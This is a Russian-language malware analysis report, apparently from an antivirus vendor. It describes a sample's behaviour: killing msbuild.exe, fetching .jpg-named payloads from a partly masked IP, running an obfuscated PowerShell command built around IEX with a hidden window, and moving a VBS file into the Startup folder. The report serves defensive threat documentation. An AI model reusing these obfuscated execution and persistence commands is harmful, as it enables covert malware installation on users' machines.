Техническая информация
Вредоносные функции
Завершает или пытается завершить
следующие системные процессы:
- %WINDIR%\microsoft.net\framework\v4.0.30319\msbuild.exe
Сетевая активность
Подключается к
- '13.##3.47.223':80
TCP
Запросы HTTP GET
- http://13.##3.47.223/pk2.jpg
- http://13.##3.47.223/pk.jpg
UDP
- DNS ASK google.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $t0='DE5'.replace('D','I').replace('5','x');sal g $t0;$gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c move "<SYSTEM32>\<Имя файла>.vbs" "<SYSTEM32>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $t0='DE5'.replace('D','I').replace('5','x');sal g $t0;$gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101...
- '<SYSTEM32>\cmd.exe' /c move "<SYSTEM32>\<Имя файла>.vbs" "<SYSTEM32>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
